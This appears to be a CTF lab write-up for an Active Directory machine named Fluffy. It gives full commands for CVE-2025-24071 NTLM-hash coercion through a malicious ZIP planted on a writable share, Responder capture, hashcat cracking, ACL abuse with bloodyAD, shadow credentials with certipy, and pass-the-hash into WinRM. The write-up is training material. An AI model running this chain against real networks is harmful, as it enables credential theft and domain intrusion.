Post

Fluffy

An assume-breach Windows AD box where a writable SMB share lets you plant a malicious .library-ms ZIP (CVE-2025-24071) to coerce a user's NetNTLMv2 hash; cracking it and abusing a GenericAll/GenericWrite ACL chain via shadow credentials yields a service account with WinRM access and the user flag.

Fluffy

Overview

Fluffy is an easy-difficulty Windows Active Directory machine built around an assume-breach scenario: you start with credentials for a low-privileged user. The path to user is a tidy modern AD chain — a writable SMB share enables a CVE-2025-24071 NTLM-leak to capture and crack a second user’s hash, then a BloodHound-mapped ACL chain (GenericAll over a group → GenericWrite over service accounts) is abused with shadow credentials to land a WinRM shell. This post covers recon through the user flag.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

Modern AD chain: CVE-2025-24071 NTLM-leak via writable share, then BloodHound-mapped ACL abuse with shadow credentials — enumeration and realistic AD misconfigs, moderate custom chaining.

Recon

PortServiceNotes
53/tcpDNSSimple DNS Plus
88/tcpKerberosDC
135/139/445RPC / SMBMicrosoft-DS
389/636/3268/3269LDAP / LDAPSDomain: fluffy.htb
443/tcpHTTPSIIS 10.0
5985/tcpWinRMHTTPAPI 2.0
1
ports=$(nmap --open 10.10.10.X | grep open | cut -d ' ' -f 1 | cut -d '/' -f 1 | paste -sd,); nmap 10.10.10.X -p $ports -sV -sC -Pn --disable-arp-ping

SMB, LDAP and Kerberos together identify a Domain Controller. The LDAP cert and scan name it dc01.fluffy.htb in domain fluffy.htb, so add both to /etc/hosts:

1
echo "10.10.10.X fluffy.htb dc01.fluffy.htb" | sudo tee -a /etc/hosts

Enumeration

With the provided credentials (j.fleischman), enumerate SMB shares:

1
netexec smb 10.10.10.X -u 'j.fleischman' -p '<pass>' --shares

An IT share comes back with READ,WRITE — the key finding. Connecting to it reveals an Upgrade_Notice.pdf:

1
smbclient '//10.10.10.X/IT' -U 'j.fleischman%<pass>' -c "get Upgrade_Notice.pdf"

The PDF is an IT-department patch notice listing recently disclosed CVEs. One stands out: CVE-2025-24071, a Windows File Explorer spoofing vulnerability that leaks a user’s NTLM hash when a crafted .library-ms file inside an extracted ZIP/RAR is rendered. Since we have a writable share that other users browse, this is the foothold.

Foothold

1 — Build the malicious archive. The public PoC generates an exploit.zip containing a .library-ms whose UNC path points back at our listener:

1
2
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
python3 CVE-2025-24071_PoC/poc.py   # enter a filename + your tun0 IP at the prompts

2 — Start Responder in a second terminal to catch the inbound SMB authentication:

1
sudo responder -I tun0

3 — Drop the ZIP into the writable share and wait. When a higher-privileged user browses IT, Explorer auto-resolves the embedded UNC path and authenticates — no click required:

1
smbclient '//10.10.10.X/IT' -U 'j.fleischman%<pass>' -c "put exploit.zip"

Within seconds Responder logs a NetNTLMv2 hash for p.agila.

4 — Crack it offline with hashcat:

1
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt   # -> prometheusx-303

Now we have a second set of credentials: p.agila : prometheusx-303.

5 — Map the AD attack path with BloodHound.

1
bloodhound-python -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' -dc 'dc01.fluffy.htb' -c all -ns 10.10.10.X

Two delegated ACLs chain together:

  • p.agila is in Service Account Managers, which has GenericAll over the Service Accounts group.
  • Service Accounts has GenericWrite over ca_svc, winrm_svc, and ldap_svc — and winrm_svc is a member of Remote Management Users (so it can use WinRM).

6 — Self-add to the group. GenericAll over the group lets us add ourselves:

1
bloodyAD -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb --host 10.10.10.X add groupMember 'service accounts' p.agila

7 — Shadow credentials to recover winrm_svc’s hash. As a member of Service Accounts we now have GenericWrite over the service accounts, which lets us write the msDS-KeyCredentialLink attribute. Certipy automates the Key Trust / PKINIT flow and dumps the NT hash:

1
2
certipy-ad shadow auto -username [email protected] -password 'prometheusx-303' -account winrm_svc
# -> NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

If you hit KRB_AP_ERR_SKEW, sync your clock to the DC first (sudo ntpdate dc01.fluffy.htb).

8 — Pass-the-hash into WinRM.

1
evil-winrm -u 'winrm_svc' -H 33bd09dcd697600edf6b3a7af4875767 -i dc01.fluffy.htb

User flag

A shell as fluffy\winrm_svc lands us the user flag:

1
type C:\Users\winrm_svc\Desktop\user.txt   # [redacted]

The privilege escalation to Administrator goes through an ADCS ESC16 misconfiguration — out of scope for this post, which stops at user.

This post is licensed under CC BY 4.0 by the author.